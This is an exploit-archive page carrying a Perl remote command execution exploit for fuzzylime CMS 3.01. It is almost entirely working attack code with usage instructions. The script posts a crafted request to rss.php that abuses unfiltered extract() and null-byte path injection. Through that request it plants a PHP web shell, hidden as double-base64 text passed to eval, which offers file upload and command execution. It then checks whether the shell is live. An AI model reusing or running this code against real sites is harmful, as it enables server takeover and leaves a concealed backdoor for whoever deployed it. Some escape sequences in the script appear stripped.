fuzzylime cms 3.01 Remote Command Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : fuzzylime cms 3.01 Remote Command Execution Exploit
# Published : 2008-07-05
# Author : Ams
# Previous Title : ImperialBB <= 2.3.5 Remote File Upload Exploit
# Next Title : 1024 CMS <= 1.4.4 Multiple Remote/Local File Inclusion Vulnerabilities
#!/usr/bin/perl
#
# fuzzylime 3.0.1 Perl exploit
#
# discovered & written by Ams
# ax330d@gmail.com
#
# DESCRIPTION:
# There are availability to load files through script
# rss.php, and also there are unfiltered extract(); usage.
# This exploit creates shell in /code/counter/middle_index_inc.php
#
# USAGE:
# Run exploit: perl expl.pl http://www.site.com
#
# NEEDED:
# magic_quotes_gpc=off
#

use strict;
use IO::Socket;

print "nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	ntt fuzzlyime 3.0.1 exploit
	nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~nn";

if(@ARGV<1){
	die "ntUsage:texpl.pl urlnn
	ntExample:texpl.pl http://localhost/path/nn";
}

my $expl_url=$ARGV[0];
my $shell=q~
<?php
$shell='YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9qQTdDaVJsY2owbkp6c2tjMjA5Snp4a2FYWWdZMnhoYzNNOUltNW1ieUkrU1c1bWJ6cGJjMkZtWlY5dGIyUmxQU2N1YVc1cFgyZGxkQ2duYzJGbVpWOXRiMlJsSnlrdUoxMG1ibUp6Y0R0YloyeHZZbUZzY3owbkxtbHVhVjluWlhRb0ozSmxaMmx6ZEdWeVgyZHNiMkpoYkhNbktTNG5YU1p1WW5Od08xdHRZV2RwWTE5eGRXOTBaWE5mWjNCalBTY3VhVzVwWDJkbGRDZ25iV0ZuYVdOZmNYVnZkR1Z6WDJkd1l5Y3BMaWRkSm01aWMzQTdXMlJwYzJGaWJHVmtYMloxYm1OMGFXOXVjejBuTG1sdWFWOW5aWFFvSjJScGMyRmliR1ZrWDJaMWJtTjBhVzl1Y3ljcExpZGRKbTVpYzNBN1BHSnlMejViY0dod09pY3VjR2h3ZG1WeWMybHZiaWdwTGlkZEptNWljM0E3VzNWelpYSTZKeTVuWlhSZlkzVnljbVZ1ZEY5MWMyVnlLQ2t1SjEwbWJtSnpjRHM4WW5JdlBsdDFibUZ0WlRvbkxuQm9jRjkxYm1GdFpTZ3BMaWRkSm01aWMzQTdQQzlrYVhZK1BHSnlMejRuT3dwcFppaHBjM05sZENna1gxQlBVMVJiSjNObGRDZGRLU2w3YVdZb2FYTnpaWFFvSkY5R1NVeEZVMXNuWm1rblhTa3BJR2xtS0NGQWJXOTJaVjkxY0d4dllXUmxaRjltYVd4bEtDUmZSa2xNUlZOYkoyWnBKMTFiSjNSdGNGOXVZVzFsSjEwc0pGOUdTVXhGVTFzblpta25YVnNuYm1GdFpTZGRLU2tnSkhOdExqMG5QSE53WVc0Z1kyeGhjM005SW1WeWNtOXlJajVEYjNWc1pDQnViM1FnYlc5MlpTQjFjR3h2WVdSbFpDQm1hV3hsSVR3dmMzQmhiajRuT3dwcFppaHBjM05sZENna1gxQlBVMVJiSjJWMllXd25YU2twZTI5aVgzTjBZWEowS0NrN1pYWmhiQ2drWDFCUFUxUmJKMlYyWVd3blhTazdKSE50TGoxdllsOW5aWFJmWTJ4bFlXNG9LVHQ5Q21semMyVjBLQ1JmVUU5VFZGc25aWGhsWXlkZEtUOGtjMjB1UFNjOGNISmxQaWN1WUNSZlVFOVRWRnRsZUdWalhXQXVKend2Y0hKbFBpYzZNRHQ5Q21WamFHOGdKenhvZEcxc1BqeG9aV0ZrUGp4MGFYUnNaVDR1TGk1MFpXMXdiM0poY25rZ2MyaGxiR3d1TGk0OEwzUnBkR3hsUGp4dFpYUmhJR2gwZEhBdFpYRjFhWFk5SWtOdmJuUmxiblF0Vkhsd1pTSWdZMjl1ZEdWdWREMGlkR1Y0ZEM5b2RHMXNPeUJqYUdGeWMyVjBQWGRwYm1SdmQzTXRNVEkxTVNJdlBnbzhjM1I1YkdVZ2RIbHdaVDBpZEdWNGRDOWpjM01pUGdwaWIyUjVlMlp2Ym5RdFptRnRhV3g1T25abGNtUmhibUVzWVhKcFlXd3NjMlZ5YVdZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpPMk52Ykc5eU9pTm1PV1k1WmprN1ptOXVkQzF6YVhwbE9qRXdjSGc3ZlFvdVltOTRlMkp2Y21SbGNqb3hjSGdnYzI5c2FXUWdJMk5qWXp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNek16TTdiV0Z5WjJsdU9tRjFkRzg3YldGeVoybHVMWFJ2Y0RvME1IQjRPM0JoWkdScGJtYzZNVEJ3ZUR0M2FXUjBhRG8wTURCd2VEdDlDaTV1Wm05N1ltOXlaR1Z5T2pGd2VDQnpiMnhwWkNBak9UazVPMkpoWTJ0bmNtOTFibVF0WTI5c2IzSTZJelkyTmp0d1lXUmthVzVuT2pWd2VEdDlDbWx1Y0hWMGUyMWhjbWRwYmpveWNIZzdmUW84TDNOMGVXeGxQand2YUdWaFpENDhZbTlrZVQ0OFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEdsd1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BncDFjR3h2WVdRNlBHbHVjSFYwSUhSNWNHVTlJbVpwYkdVaUlHNWhiV1U5SW1acElpOCtQR0p5THo0S1kyMWtPaVp1WW5Od096eHBibkIxZENCMGVYQmxQU0owWlhoMElpQnVZVzFsUFNKbGVHVmpJaUIyWVd4MVpUMGlJaTgrUEdKeUx6NEtaWFpoYkRvbWJtSnpjRHM4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWFpoYkNJZ2RtRnNkV1U5SWlJdlBqeGljaTgrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==';
eval(base64_decode(base64_decode($shell)));
?>
~;
my $shell_name='middle_index.inc.php';

print "tStarting exploit...n";
if($expl_url=~m#http://#){
	exploit($expl_url);
} else {
	exploit('http://'.$expl_url);
}

sub exploit {
	#	Defining...
	my $site=pop @_;
	(my $a,my $b,my $c,my @d)=split ///,$site;
	my $path=join('/',@d);
	my $host=$c;
	if($path) {$path='/'.$path;}
	my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell";
	my $length=length($injection);

	#	Injecting...
	my $socket=IO::Socket::INET->new(
		Proto=>"tcp",
		PeerAddr=>$host,
		PeerPort=>"80"
	);
	if( ! $socket){
		die("ntUnable to connect to http://$hostnn");
	} else {
		
		my $packet = "POST $path/rss.php HTTP/1.1rn";
		$packet .= "Host: $hostrn";
		$packet .= "Connection: Closern";
		$packet .= "Content-Type: application/x-www-form-urlencodedrn";
		$packet .= "Content-Length: $lengthrnrn";
		$packet .= "$injection";
		print $socket $packet;
		close($socket);
	}
	sleep(1);
	#	Checking for shell...
	$socket=IO::Socket::INET->new(
		Proto=>"tcp",
		PeerAddr=>$host,
		PeerPort=>"80"
	);
	if( ! $socket){
		die("ntUnable to connect to http://$host (check shell yourself)nn");
	} else {
		my $packet = "POST $path/code/counter/$shell_name HTTP/1.1rn";
		$packet .= "Host: $hostrn";
		$packet .= "Connection: Closernrn";
		print $socket $packet;

		my $rcv;
		my $dat='';
		while($rcv=<$socket>){
			$dat.=$rcv;
		}
		if ($dat =~ /200 OK/){
			print "nt$sitet[OK]nn";
		} else {
			print "nt$sitet[FAIL]nn";
		}
		close($socket);
	}
}

# www.Syue.com [2008-07-05]